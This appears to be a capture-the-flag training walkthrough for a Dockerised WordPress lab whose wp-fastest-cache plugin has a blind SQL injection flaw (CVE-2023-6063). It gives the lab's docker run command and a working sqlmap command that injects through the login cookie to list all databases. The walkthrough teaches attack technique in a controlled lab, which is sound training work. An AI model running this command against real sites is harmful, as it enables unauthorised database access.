IP Address: 172.25.200.200

Port: 9042

Want to run this Docker container locally?

docker run -d -p 9042:80 --restart always --name flag-red61 joshbeck2024/ctf-blind-sql-injection-training-flag-red61

$$ Red61 $$

We initially have a WordPress site running wp-fastest-cache vulnerable to CVE-2023-6063:

Generally speaking, the program wpscan would be a good choice, but it won’t detect the plugin installed here.

If you look at the source code at the bottom of the main page, you’ll find this tell-tale signature:

• The plugin wp-fastest-cache is installed here

Part 1: SQLMap Exploit

Because SQLMap is supremely capable of auto-hacking websites that lack input sanitization, PoC (Proof of Concept) code is really easy to find.

• Click Here

On Kali, Run the exploit below and you’ll see that the names of each database are derived one letter at at time.

• The question: How the heck is SQLMap doing this?
• The command below prints the names of all databases in the MySQL installation.

sqlmap --dbms=mysql -u "http://IP_OF_TARGET:9042/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --dbs